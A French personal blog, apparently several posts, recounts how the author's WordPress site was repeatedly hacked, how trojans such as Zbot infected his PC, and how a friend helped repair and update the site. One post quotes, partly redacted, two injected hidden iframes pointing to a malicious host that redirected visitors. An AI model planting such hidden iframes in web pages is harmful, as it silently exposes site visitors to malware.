Débloque-notes

Grâce à l’intervention patiente et efficace de mon ami Klaas, ce bloc-notes a retrouvé hier sa bonne santé (merci de me signaler les défauts, les liens morts et autres scories qui subsistent).

Comment remercier Klaas d’avoir si généreusement consacré son temps si précieux et son énergie si douce à des travaux d’entretien pour lesquels je n’ai pas moi-même (en ce moment) les ressources ?

Klaas dit que cette aide est sa manière à lui de me remercier de lui avoir mis le pied à l’étrier il y a quelques années, l’incitant à faire connaître ses activités de luthier sur l’internet en créant pour lui le blog www.sitarfactory.be. Entretemps celui-ci est devenu le magnifique atelier de lutherie www.sitarfactory.be/.

Je voudrais donc inviter les lecteurs de ce message à passer ou repasser dans la tannière de Klaas pour y laisser un salut amical.

Ainsi il sera démontré une fois de plus que les blogs et l’internet en général sont aussi de nature à entretenir et même à renforcer des liens d’amitié qui autrement manqueraient de terrain pour s’épanouir dans la vraie vie, où les journées n’ont que vingt-quatre heures et les heures soixante minutes.
Dans le virtuel, l’amitié a non seulement droit de cité, mais elle se joue des mesquineries du calendrier.

Pour l’instant, et pour des raisons de sécurité que j’ai eu le tort de négliger jusqu’à ce jour, les commentaires sont bloqués sur www.tarana.be/sarod alors qu’auparavant n’importe qui pouvait commenter. Or il semble que c’est par là que s’est introduite la vérole qui avait bloqué ce site depuis la fin de l’été.
Désormais il va donc falloir montrer patte blanche. Patience, le temps pour moi de mettre en place cette nouvelle guérite.

Merci Klaas !

Depuis le 8 septembre ce site était devenu inaccessible.
Je viens de m’apercevoir de la présence dans la racine du fichier .htaccess suivant, créé par je ne sais qui, pas moi en tout cas, Free peut-être ? :

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]


# END WordPress

Je l’ai supprimé, ça remarche.
Il me semble qu’il y a aussi un changement dans le tableau de bord. La ligne suivante apparaît sous le titre du billet, on dirait que c’est nouveau :

Il serait temps de mettre à jour cette vieille version de WP.
Pas le temps…

Ce n’est plus un ordinateur, c’est une écurie que j’ai devant moi ! Je viens encore de découvrir deux chevaux de Troie planqués dans du courriel reçu à l’adresse sarod(à)free.fr, heureusement encore inactifs, et dont j’ai pu me débarrasser assez rapidement ce soir malgré un moment de découragement.
Quand je l’ai remarqué je venais en effet de transférer tout mon courrier électronique (sous theBat!) sur l’ordinateur portable afin de pouvoir faire le ménage sur le PC de bureau. Car sur celui-là les problèmes persistent, et pour l’instant aucun des programmes dont je dispose n’arrive à bout de ce troyen, qui lui est actif. Il ne s’agit plus de ntos.exe, mais d’un autre… que certains programmes détectent, d’autres pas.
Trojan-Spy.Zbot
Trojan-Spy.Zbot is a rootkit trojan which steals online banking information and downloads other malware as well. It opens backdoors on infected computer to allow malicious attacker unauthorized access.
Type: TT_Backdoor, TT_Rootkit, TT_Spyw

Timeo Danaos et dona ferentes.

Entretemps c’est Klaas qui s’est généreusement occupé de la mise à jour de la version de WordPress utilisé pour ce bloc-notes. Il était devenu urgent de passer à 2.5 mais malheureusement hors de question pour moi de m’en occuper, pour des raisons de temps et de disponibilité.
Je suis encore loin semble-t-il d’avoir retrouvé le minimum de sérénité requis pour entretenir ces pages, mais une amélioration est en vue.

Les récentes éclipses à répétition de cette page ne laissaient rien présager de bon… chaque fois que je supprimais l’index.htm trafiqué par le très-méchant olthart.com, il réapparaissait quelques heures plus tard.
Un premier changement de mot de passe s’est révélé insuffisant, les attaques se renouvelaient aussitôt.
Grâce à l’aide généreuse de mon ami Klaas (car je n’ai pas trop le temps de m’en occuper moi-même ces jours-ci), on dirait que la fuite a été colmatée, avec cette fois un mot de passe plus robuste que les précédents. Ces opérations m’ont incité à m’interroger sur un curieux message d’erreur de ma machine me donnait en démarrant depuis quelques jours : ntos.exe
Je me disais bien que ça sentait le crottin, le crottin de cheval et plus précisément le cheval de Troie. Et merde ! Comme si je n’avais que ça à faire.
HijackThis confirme la contamination, il trouve la trace de ntos.exe dans les registres, mais ad-aware n’y voit que du feu. Avec d’autres outils soi-disant de sécurité ce n’est guère mieux.
Un cheval qui joue à cache-cache ?

Dans la série « WP m’a tuer » que je croyais terminée, j’ai eu une mauvaise surprise. Ces pages sont restées inaccessibles pendant quelques jours. Faute de temps et de disponibilité je n’ai pu vérifier que ce soir ce qui s’était passé. Il s’agissait apparemment d’une attaque classique avec création et détournement d’une page index.htm à l’aide de deux iframe et détournement de la page index.php existante de Word-Press sur laquelle l’intrus a rajouté ces iframe pour détourner les visiteurs vers un site malveillant :
iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’261′ height=’249′ style=’display:none’> iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’5′ height=’304′ style=’display:none’> /iframe

Il va de soi que j’ai supprimé ce code malveillant avant de remettre en ligne la page index.php de WP.

Il reste à comprendre comment l’intrus est entré sur le serveur. Soit par le FTP, soit par l’entrée administrative de WordPress. Il est possible en effet de modifier le fichier index.php dans Word-Press, mais j’ignore comment dans ce cas il aurait créé le fichier index.htm

Parmi les nouveaux modules installés avec WordPress, je recommande (dans l’ordre alphabétique) :
Audio player comme son nom l’indique
Archivist pour afficher un billet au hasard
Character Map comme son nom l’indique (voir ci-dessous)

Egalement les suivants que je n’ai pas encore eu l’occasion de tester pour de bon, mais qui ont l’air de fonctionner :
IImage Browser
IImage Gallery
Simple Popup Images

Voici ce que donne Character Map :
Greek ; ΄ ΅ Ά · Έ Ή Ί Ό Ύ Ώ ΐ Α Β Γ Δ Ε Ζ Η Θ Ι Κ Λ Μ Ν Ξ Ο Π Ρ Σ Τ Υ Φ Χ Ψ Ω Ϊ Ϋ
ά έ ή ί ΰ α β γ δ ε ζ η θ ι κ λ μ ν ξ ο π ρ ς σ τ υ φ χ ψ ω ϊ ϋ ό ύ ώ

Cyrillic Ё Ђ Ѓ Є Ѕ І Ї Ј Љ Њ Ћ Ќ Ў Џ
А Б В Г Д Е Ж З И Й К Л М Н О П Р С Т У Ф Х Ц Ч Ш Щ Ъ Ы Ь Э Ю Я
а б в г д е ж з и й к л м н о п р с т у ф х ц ч ш щ ъ ы ь э ю я
ё ђ ѓ є ѕ і ї ј љ њ ћ ќ ў џ Ґ ґ Ғ ғ Җ җ Қ қ Ҝ ҝ Ң ң Ү ү Ұ ұ Ҳ ҳ Ҹ ҹ Һ һ Ә ә Ө ө

General Punctuation !  » # % & ( ) * , – . / : ; ? @ [ ] _ { | }
¡ ¦ § © « ¬ ® ° µ ¶ · » ¿ – — ― ‗ ‘ ’ ‚ ‛ “ ” „ † ‡ • … ‰ ′ ″ ‹ › ‼ ‾ ⁄

Currency $ ¢ £ ¤ ¥ ₣ ₤ ₧ ₪ ₫ €

Letterlike Symbols ℅ ℓ № ™ Ω ℮

Number Forms ¼ ½ ¾ ⅓ ⅔ ⅛ ⅜ ⅝ ⅞

Mathematical Operators + < = > ± × ÷ ∂ ∆ ∏ ∑ − ∕ ∙ √ ∞ ∟ ∩ ∫ ≈ ≠ ≡ ≤ ≥

Symbols & Dingbats ☺ ☻ ☼ ♀ ♂ ♠ ♣ ♥ ♦ ♪ ♫ █ ▓ ►

Spacing Modifier Letters ^ ` ~ ¨ ¯ ´ ¸ ˆ ˇ ˉ ˘ ˙ ˚ ˛ ˜ ˝

Je me suis enfin décidé hier soir à mettre à jour la version 1.5 de WP que j’utilisais pour ce bloc-notes.
Ce que je craignais depuis les ennuis de l’année dernière (où une partie du site avait été amochée accenditellement par WP) s’est reproduit. Au moment de la mise à jour des tableaux de la base de données, le programme a signalé un erreur… et a refusé d’aller plus loin.
A force d’insister et de réessayer (c’est-à-dire vers 5 h du matin) j’ai fini par retrouver le bloc-notes à peu près au complet. Il semblerait que la seule trace qui reste de ces difficultés soit la mutilation du menu avec les catégories, ce qui n’est pas une grande perte.

On lit pis que pendre sur Google (par exemple ici) mais je viens de faire une nouvelle fois l’expérience agréable de l’efficacité de Google Desktop Search. Il a retrouvé en une fraction de seconde dans son cache le billet sur la musique de Bahadur Khan inexplicablement perdu hier dans les replis de WordPress. Je n’en avais pas de copie.
Sans GDS ce texticule aurait été irrémédiablement perdu… ce qui n’aurait de toute façon pas été bien grave en soi.

Suite à la destruction partielle de ce débloque-notes, la plupart des commentaires ont été effacés.
Je les remettrai au fur et à mesure…